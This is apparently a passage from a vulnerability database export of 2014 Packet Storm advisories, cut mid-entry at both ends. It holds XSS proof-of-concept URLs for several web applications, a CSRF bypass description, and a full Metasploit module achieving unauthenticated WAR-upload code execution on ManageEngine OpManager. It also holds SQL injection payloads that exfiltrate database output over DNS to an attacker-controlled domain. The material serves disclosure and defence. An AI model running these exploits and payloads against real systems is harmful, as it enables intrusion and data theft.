A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&callback=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"dir\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=jpg&dir=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.3 Input passed via the \"extensions\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in victim's browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin-ajax.php?action=addImages&width=700&height=550&extensions=%27%22%3E%3C/script%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Photo Gallery 1.1.31 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23232 - https://www.htbridge.com/advisory/HTB23232 - Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin. \n[2] Photo Gallery WordPress plugin - http://web-dorado.com/ - This plugin is a fully responsive gallery plugin with advanced functionality. It allows having different image galleries for your posts and pages. You can create unlimited number of galleries, combine them into albums, and provide descriptions and tags. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128518/wpphotogallery1130-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:16:11", "description": "", "published": "2014-09-22T00:00:00", "type": "packetstorm", "title": "KonaKart Storefront Application Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5516"], "modified": "2014-09-22T00:00:00", "id": "PACKETSTORM:128342", "href": "https://packetstormsecurity.com/files/128342/KonaKart-Storefront-Application-Cross-Site-Request-Forgery.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n \nCVE-2014-5516 \n=================== \n\"Cross-Site Request Forgery (CSRF) protection bypass\" (CWE-352) vulnerability \nin \"KonaKart Storefront Application\" Enterprise Java eCommerce product \n \n \nVendor \n=================== \nDS Data Systems (UK) Ltd. \n \n \nProduct \n=================== \n\"KonaKart is an affordable java based shopping cart software solution for online retailers. \nLet KonaKart help increase your eCommerce sales.\" \n- source: http://www.konakart.com \n \n\"KonaKart is a Java eCommerce system aimed at medium to large online retailers.\" \n- source: https://en.wikipedia.org/wiki/KonaKart \n \n \nAffected versions \n=================== \nThis vulnerability affects versions of KonaKart Storefront Application prior to 7.3.0.0 \n \n \nPatch \n=================== \nThe vendor has released a XSRF fix as part of version 7.3.0.0 at \nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new \n \n \nReported by \n=================== \nThis issue was reported to the vendor by Christian Schneider (@cschneider4711) \nfollowing a responsible disclosure process. 
\n \n \nSeverity \n=================== \nMedium \n \n \nDescription \n=================== \nThe existing CSRF protection token was checked for every POST request \nproperly. When modifying the request from POST method to GET method \nall state-changing actions worked as well, but the CSRF token protection \nwas no longer enforced, allowing CSRF attacks. \n \n \nEscalation potential \n==================== \nExploitation demonstration was responsibly provided along with the vulnerability \nreport to the vendor, which changed a victim's mail address (using the CSRF \nprotection bypass) to an attacker-supplied mail address, allowing a successful \nreset of victim's account password by the attacker. \n \n \nTimeline \n=================== \n2014-05-02 Vulnerability discovered \n2014-05-02 Vulnerability responsibly reported to vendor \n2014-05-02 Reply from vendor acknowledging report \n2014-??-?? Vendor released patch as part of version 7.3.0.0 \n2014-09-20 Advisory published via BugTraq \n \n \nReferences \n=================== \nhttp://www.konakart.com/downloads/ver-7-3-0-0-whats-new \nhttp://www.christian-schneider.net/advisories/CVE-2014-5516.txt \n \n \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (Darwin) \n \niEYEARECAAYFAlQd69cACgkQXYAsOfddvFOTVACgr/f5+x5kf60t5LaCqhH0pvSY \nQYoAnjiI0WSa3iGuw/OfXk3/vLV+liFm \n=61mn \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 3.7, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128342/konakart-xsrf.txt"}, {"lastseen": "2016-12-05T22:17:52", "description": "", "published": "2014-09-03T00:00:00", "type": "packetstorm", "title": "MyWebSQL 3.4 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4735"], "modified": "2014-09-03T00:00:00", "id": "PACKETSTORM:128140", "href": "https://packetstormsecurity.com/files/128140/MyWebSQL-3.4-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23221 \nProduct: 
MyWebSQL \nVendor: http://mywebsql.net/ \nVulnerable Version(s): 3.4 and probably prior \nTested Version: 3.4 \nAdvisory Publication: June 25, 2014 [without technical details] \nVendor Notification: June 25, 2014 \nPublic Disclosure: September 3, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-4735 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735 \n \nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it. \n \nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nDisclosure timeline: \n2014-06-25 Vendor alerted via emails and contact form. \n2014-07-03 Vendor alerted via emails, contact form and twitter. \n2014-07-03 Vendor replied that he received information. \n2014-07-10 Fix requested. 
\n2014-07-10 Vendor requested to move public disclosure date to August 30. \n2014-08-27 Fix requested. \n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch. \n2014-08-27 Disclosure date moved to September 3. \n2014-09-01 Fix requested. \n2014-09-03 Public disclosure, patch by HTB Research is available. \n \nCurrently we are not aware of any official solution for this vulnerability. \nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23221 - https://www.htbridge.com/advisory/HTB23221 - Cross-Site Scripting (XSS) in MyWebSQL. \n[2] MyWebSQL - http://mywebsql.net/ - MyWebSQL is the ultimate desktop replacement for managing your MySQL databases over the web. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128140/mywebsql-xss.txt"}, {"lastseen": "2016-12-05T22:25:11", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6034"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128477", "href": "https://packetstormsecurity.com/files/128477/ManageEngine-OpManager-Social-IT-Arbitrary-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. \nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated \nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on \nversion 11.0 of SocialIT for Windows and Linux. 
\n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6034' ], \n[ 'OSVDB', '112276' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] \n], \n'Privileged' => true, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 27 2014')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"), \n'method' => 'GET' \n}) \n \n# A GET request on this servlet returns \"405 Method not allowed\" \nif res and res.code == 405 \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef upload_war_and_exec(try_again, app_base) \ntomcat_path = '../../../tomcat/' \nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' \n \nif try_again \n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration \n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file. \n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments. \n# After replacing the context.xml file let's upload the WAR again. 
\nprint_status(\"#{peer} - Replacing Tomcat context file\") \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>}, \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => tomcat_path + \"conf\", \n'FILENAME' => \"context.xml\" \n} \n}) \nelse \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directories\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => rand_text_alphanumeric(4 + rand(32 - 4)), \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => \"\", \n'FILENAME' => bogus_file \n} \n}) \nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file) \nend \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => war_payload, \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'regionID' => tomcat_path + \"webapps\", \n'FILENAME' => app_base + \".war\" \n} \n}) \n \n# The server either returns a 500 error or a 200 OK when the upload is successful. 
\nif res and (res.code == 500 or res.code == 200) \nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s + \n\" seconds for deployment\") \nsleep(datastore['SLEEP']) \nelse \nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload, wait for session...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nupload_war_and_exec(false, app_base) \nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\") \n \nsleep_counter = 0 \nwhile not session_created? \nif sleep_counter == datastore['SLEEP'] \nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\") \nupload_war_and_exec(true, app_base) \nreturn \nend \n \nsleep(1) \nsleep_counter += 1 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128477/opmanager_socialit_file_upload.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:13:41", "description": "", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "packetstorm", "title": "All In One WP Security 3.8.2 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "id": "PACKETSTORM:128419", "href": "https://packetstormsecurity.com/files/128419/All-In-One-WP-Security-3.8.2-SQL-Injection.html", "sourceData": "`Advisory ID: HTB23231 \nProduct: All In One WP Security WordPress plugin \nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior \nTested Version: 3.8.2 \nAdvisory Publication: September 3, 2014 [without technical details] \nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 
\nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-6242 \nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n \n \n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 \n \n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.: \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \n \n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. 
The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with a CSRF exploit, e.g.: \n \n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\"> \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to All In One WP Security 3.8.3 \n \nMore Information: \nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin. 
\n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128419/aiowpsecurity-sql.txt", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:22:30", "description": "", "published": "2014-09-17T00:00:00", "type": "packetstorm", "title": "MODX Revolution 2.3.1-pl Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5451"], "modified": "2014-09-17T00:00:00", "id": "PACKETSTORM:128302", "href": "https://packetstormsecurity.com/files/128302/MODX-Revolution-2.3.1-pl-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23229 \nProduct: MODX Revolution \nVendor: MODX \nVulnerable Version(s): 2.3.1-pl and probably prior \nTested Version: 2.3.1-pl \nAdvisory Publication: August 20, 2014 [without technical details] \nVendor Notification: August 20, 2014 \nVendor Patch: September 11, 2014 \nPublic Disclosure: September 17, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-5451 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in MODX Revolution, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MODX Revolution: CVE-2014-5451 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via the \"a\" HTTP GET parameter to \"/manager/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\nThis vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate \"manager/templates/default/header.tpl\" file from GitHub. \n \nMore Information: \nhttps://github.com/modxcms/revolution/issues/11966 \nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23229 - https://www.htbridge.com/advisory/HTB23229 - Reflected Cross-Site Scripting (XSS) in MODX Revolution. \n[2] MODX Revolution - http://modx.com - MODX Revolution is the web content management platform for those that truly care about no-compromise design and exceptional user experience. It gives you complete control over your site and content, with the flexibility and scalability to adapt to your changing needs. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. 
\n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128302/modxrevolution-xss.txt"}, {"lastseen": "2016-12-05T22:19:14", "description": "", "cvss3": {}, "published": "2014-10-09T00:00:00", "type": "packetstorm", "title": "WordPress EWWW Image Optimizer 2.0.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6243"], "modified": "2014-10-09T00:00:00", "id": "PACKETSTORM:128621", "href": "https://packetstormsecurity.com/files/128621/WordPress-EWWW-Image-Optimizer-2.0.1-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23234 \nProduct: EWWW Image Optimizer WordPress plugin \nVendor: Shane Bishop \nVulnerable Version(s): 2.0.1 and probably prior \nTested Version: 2.0.1 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: September 24, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-6243 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in EWWW Image Optimizer WordPress plugin, which can be exploited to perform Cross-Site Scripting 
(XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress plugin: CVE-2014-6243 \n \nInput passed via the \"page\" HTTP GET parameter to \"/wp-admin/options-general.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \n \nhttp://wordpress/wp-admin/options-general.php?page=ewww-image-optimizer/ewww-image-optimizer.php&pngout=failed&error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to EWWW Image Optimizer 2.0.2. \n \nMore Information: \nhttps://wordpress.org/plugins/ewww-image-optimizer/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23234 - https://www.htbridge.com/advisory/HTB23234 - Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin. \n[2] EWWW Image Optimizer WordPress plugin - http://www.shanebishop.net/ - Reduce file sizes for images within WordPress including NextGEN Gallery and GRAND FlAGallery. Uses jpegtran, optipng/pngout, and gifsicle. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128621/wpewwwio-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The Open Source Collaboration provides an integration with your existing Linux mail server, native mobile phone support by ActiveSync compatibility and a webaccess with 'Look & Feel' similar to Outlook using Ajax. Including an IMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open Source Collaboration can combine the usability with the stability and the flexibility of a Linux server. The proven Zarafa groupware solution is using MAPI objects, provides a MAPI client library as well as programming interfaces for C++, PHP and Python. The other Zarafa related packages need to be installed to gain all features and benefits of the Zarafa Collaboration Platform (ZCP). 
